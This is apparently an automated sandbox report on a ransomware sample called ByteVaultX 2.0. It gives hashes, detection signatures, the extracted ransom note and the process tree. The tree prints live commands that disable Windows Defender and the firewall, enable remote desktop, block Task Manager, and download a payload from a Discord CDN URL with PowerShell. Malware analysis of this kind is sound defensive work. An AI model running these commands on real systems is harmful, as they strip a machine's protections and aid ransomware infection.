Analysis

  • max time kernel
    246s
  • max time network
    248s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-05-2024 23:54

Errors

Reason
Machine shutdown

General

  • Target

    ByteVaultX 2.0.exe

  • Size

    9.9MB

  • MD5

    26001ddd86377ac2ec3fcedb8d6f36b9

  • SHA1

    cf4d832df5227ede476c0794cf871a4bcecb4d36

  • SHA256

    a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c

  • SHA512

    a09fe56683b4a42ce02b0e1e28557223bf0e925212e9f6541a805b914e08ab06843821d8e991fa0d3709e4e41b55db4c7b95496a29958665d10ab177b5a62277

  • SSDEEP

    196608:9h5kRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:aGFG8S1+TtIi+Y9Z8D8CclydoPx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note
Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

  • Renames multiple (136) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 2 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 16 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

    Using powershell.exe command.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
    "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
      "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Drops desktop.ini file(s)
      • Suspicious use of WriteProcessMemory
      PID:4708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4024
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3112
      • C:\Windows\SYSTEM32\runas.exe
        runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
        3⤵
          PID:1396
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd06bb46f8,0x7ffd06bb4708,0x7ffd06bb4718
            4⤵
              PID:4776
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
              4⤵
                PID:1740
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2824
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
                4⤵
                  PID:3840
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                  4⤵
                    PID:5100
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                    4⤵
                      PID:4700
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                      4⤵
                        PID:668
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4496
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:1
                        4⤵
                          PID:4356
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                          4⤵
                            PID:2544
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
                            4⤵
                              PID:5608
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                              4⤵
                                PID:5616
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2148 /prefetch:1
                                4⤵
                                  PID:5332
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
                                  4⤵
                                    PID:5412
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5232 /prefetch:8
                                    4⤵
                                      PID:5776
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1836 /prefetch:8
                                      4⤵
                                      • Modifies registry class
                                      PID:5796
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
                                      4⤵
                                        PID:5184
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,7621505115201462651,3126332780174374879,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                        4⤵
                                          PID:5592
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4480
                                        • C:\Windows\system32\reg.exe
                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                          4⤵
                                            PID:1632
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                            4⤵
                                              PID:1468
                                            • C:\Windows\system32\reg.exe
                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                              4⤵
                                                PID:2280
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                4⤵
                                                  PID:4184
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3112
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2800
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3736
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3884
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1468
                                                • C:\Windows\system32\netsh.exe
                                                  netsh firewall set opmode disable
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:4772
                                                • C:\Windows\system32\netsh.exe
                                                  netsh firewall set opmode mode=DISABLE
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:3800
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall set currentprofile state off
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:4160
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall set domainprofile state off
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:3736
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall set privateprofile state off
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:5244
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall set publicprofile state off
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:5280
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall set allprofiles state off
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:5316
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5360
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5488
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5700
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5864
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6020
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2244
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2468
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5328
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                    5⤵
                                                      PID:5472
                                                      • C:\Windows\system32\reg.exe
                                                        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                        6⤵
                                                          PID:5516
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                          6⤵
                                                            PID:5588
                                                          • C:\Windows\system32\reg.exe
                                                            reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                            6⤵
                                                              PID:5600
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                              6⤵
                                                                PID:5760
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5788
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5976
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:6044
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5196
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1932
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh firewall set opmode disable
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:5272
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh firewall set opmode mode=DISABLE
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:5296
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall set currentprofile state off
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:1596
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall set domainprofile state off
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:5288
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall set privateprofile state off
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:5484
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall set publicprofile state off
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:5460
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall set allprofiles state off
                                                                6⤵
                                                                • Modifies Windows Firewall
                                                                PID:5444
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5440
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5604
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5820
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:6108
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:6028
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1160
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                6⤵
                                                                • Blocklisted process makes network request
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5196
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Modifies registry class
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2528
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                  7⤵
                                                                    PID:3364
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                      8⤵
                                                                        PID:5316
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                        8⤵
                                                                          PID:5460
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                          8⤵
                                                                            PID:5416
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                            8⤵
                                                                              PID:5424
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5496
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5440
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5604
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:6092
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:6068
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh firewall set opmode disable
                                                                              8⤵
                                                                              • Modifies Windows Firewall
                                                                              PID:5220
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                          6⤵
                                                                          • Sets desktop wallpaper using registry
                                                                          PID:2468
